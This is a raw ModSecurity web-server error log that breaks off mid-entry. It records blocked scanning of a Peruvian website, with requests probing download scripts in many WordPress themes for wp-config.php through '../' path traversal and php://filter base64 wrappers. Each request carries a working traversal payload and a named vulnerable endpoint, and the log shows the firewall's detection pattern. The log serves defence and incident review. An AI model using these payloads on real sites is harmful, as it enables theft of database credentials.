ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/SMWF/inc/download.php?file=php://filter/read=convert.base64-encode/resource=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/SMWF/inc/download.php"] [unique_id "ZJiRy9jYcHyO0P41DG2akAAAAUk"] [Sun Jun 25 14:13:16.874406 2023] [:error] [pid 24793:tid 140255862494976] [client 198.98.54.49:40860] [client 198.98.54.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/TheLoft/download.php?file=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/TheLoft/download.php"] [unique_id "ZJiRzI27ibjPM5oQg142EgAAAAU"] [Sun Jun 25 14:13:17.798646 2023] [:error] [pid 6294:tid 140255879280384] [client 198.98.54.49:40868] [client 198.98.54.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/TheLoft/download.php?file=php://filter/read=convert.base64-encode/resource=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/TheLoft/download.php"] [unique_id "ZJiRzdjYcHyO0P41DG2akQAAAUM"] [Sun Jun 25 14:13:18.770088 2023] [:error] [pid 24795:tid 140255862494976] [client 198.98.54.49:40874] [client 198.98.54.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/acento/includes/view-pdf.php?download=1&file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/acento/includes/view-pdf.php"] [unique_id "ZJiRzvMRudKiOmssFP6IHgAAAIU"] [Sun Jun 25 14:13:19.813154 2023] [:error] [pid 6294:tid 140255904458496] [client 94.16.121.226:40880] [client 94.16.121.226] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/acento/includes/view-pdf.php?download=1&file=php://filter/read=convert.base64-encode/resource=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/acento/includes/view-pdf.php"] [unique_id "ZJiRz9jYcHyO0P41DG2akwAAAUA"] [Sun Jun 25 14:13:20.840802 2023] [:error] [pid 24992:tid 140255772534528] [client 94.16.121.226:40882] [client 94.16.121.226] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/antioch/lib/scripts/download.php"] [unique_id "ZJiR0Nki1nVtQtQNGjpHAQAAAMc"] [Sun Jun 25 14:13:21.753957 2023] [:error] [pid 6220:tid 140255722178304] [client 94.16.121.226:40886] [client 94.16.121.226] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/antioch/lib/scripts/download.php?file=php://filter/read=convert.base64-encode/resource=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/antioch/lib/scripts/download.php"] [unique_id "ZJiR0eP43hfhSzKM50NAcQAAAQ0"] [Sun Jun 25 14:13:22.760695 2023] [:error] [pid 24992:tid 140255638251264] [client 94.16.121.226:40888] [client 94.16.121.226] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/authentic/includes/download.php"] [unique_id "ZJiR0tki1nVtQtQNGjpHAgAAANc"] [Sun Jun 25 14:13:23.725087 2023] [:error] [pid 24992:tid 140255747356416] [client 94.16.121.226:40890] [client 94.16.121.226] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/authentic/includes/download.php?file=php://filter/read=convert.base64-encode/resource=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/authentic/includes/download.php"] [unique_id "ZJiR09ki1nVtQtQNGjpHAwAAAMo"] [Sun Jun 25 14:13:24.666346 2023] [:error] [pid 6220:tid 140255747356416] [client 94.16.121.226:40892] [client 94.16.121.226] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/cafesalivation/download.php?filename=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/cafesalivation/download.php"] [unique_id "ZJiR1OP43hfhSzKM50NAcgAAAQo"] [Sun Jun 25 14:13:25.722499 2023] [:error] [pid 24794:tid 140255738963712] [client 94.16.121.226:40894] [client 94.16.121.226] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/cafesalivation/download.php?filename=php://filter/read=convert.base64-encode/resource=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/cafesalivation/download.php"] [unique_id "ZJiR1fmk349J9ip3GVxZnQAAAEs"] [Sun Jun 25 14:13:26.666234 2023] [:error] [pid 24794:tid 140255887673088] [client 94.16.121.226:40896] [client 94.16.121.226] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZJiR1vmk349J9ip3GVxZngAAAEI"] [Sun Jun 25 14:13:27.644925 2023] [:error] [pid 6294:tid 140255730571008] [client 94.16.121.226:40898] [client 94.16.121.226] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/churchope/lib/downloadlink.php?file=php://filter/read=convert.base64-encode/resource=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZJiR19jYcHyO0P41DG2alAAAAUw"] [Sun Jun 25 14:13:28.580211 2023] [:error] [pid 24794:tid 140255680214784] [client 94.16.121.226:40900] [client 94.16.121.226] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/endlesshorizon/download.php?file=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/endlesshorizon/download.php"] [unique_id "ZJiR2Pmk349J9ip3GVxZnwAAAFI"] [Sun Jun 25 14:13:29.710519 2023] [:error] [pid 6294:tid 140255772534528] [client 199.195.251.119:40902] [client 199.195.251.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/endlesshorizon/download.php?file=php://filter/read=convert.base64-encode/resource=.../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/endlesshorizon/download.php"] [unique_id "ZJiR2djYcHyO0P41DG2alQAAAUc"] [Sun Jun 25 14:13:32.739760 2023] [:error] [pid 6294:tid 140255870887680] [client 199.195.251.119:40906] [client 199.195.251.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/estrutura-basica/scripts/download.php?arquivo=../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/estrutura-basica/scripts/download.php"] [unique_id "ZJiR3NjYcHyO0P41DG2algAAAUQ"] [Sun Jun 25 14:13:34.275146 2023] [:error] [pid 6294:tid 140255713785600] [client 199.195.251.119:40908] [client 199.195.251.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/felis/download.php?file=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/felis/download.php"] [unique_id "ZJiR3tjYcHyO0P41DG2alwAAAU4"] [Sun Jun 25 14:13:36.601695 2023] [:error] [pid 6294:tid 140255764141824] [client 199.195.251.119:40910] [client 199.195.251.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/green_farming_new/download.php?download_file=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/green_farming_new/download.php"] [unique_id "ZJiR4NjYcHyO0P41DG2amAAAAUg"] [Sun Jun 25 14:13:41.146523 2023] [:error] [pid 24795:tid 140255629858560] [client 185.244.192.184:40922] [client 185.244.192.184] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/kap/download.php?url=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/kap/download.php"] [unique_id "ZJiR5fMRudKiOmssFP6IIAAAAJg"] [Sun Jun 25 14:13:43.141811 2023] [:error] [pid 24992:tid 140255887673088] [client 185.244.192.184:40926] [client 185.244.192.184] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/liberator/inc/php/download.php?download_file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/liberator/inc/php/download.php"] [unique_id "ZJiR59ki1nVtQtQNGjpHBAAAAMI"] [Sun Jun 25 14:13:45.165455 2023] [:error] [pid 24992:tid 140255870887680] [client 185.244.192.184:40928] [client 185.244.192.184] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/linenity/functions/download.php"] [unique_id "ZJiR6dki1nVtQtQNGjpHBQAAAMQ"] [Sun Jun 25 14:13:47.438935 2023] [:error] [pid 6294:tid 140255638251264] [client 185.244.192.184:40932] [client 185.244.192.184] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/lote27/download.php?download=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/lote27/download.php"] [unique_id "ZJiR69jYcHyO0P41DG2anQAAAVc"] [Sun Jun 25 14:13:49.230882 2023] [:error] [pid 6294:tid 140255722178304] [client 185.244.192.184:40936] [client 185.244.192.184] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "ZJiR7djYcHyO0P41DG2angAAAU0"] [Sun Jun 25 14:13:50.311634 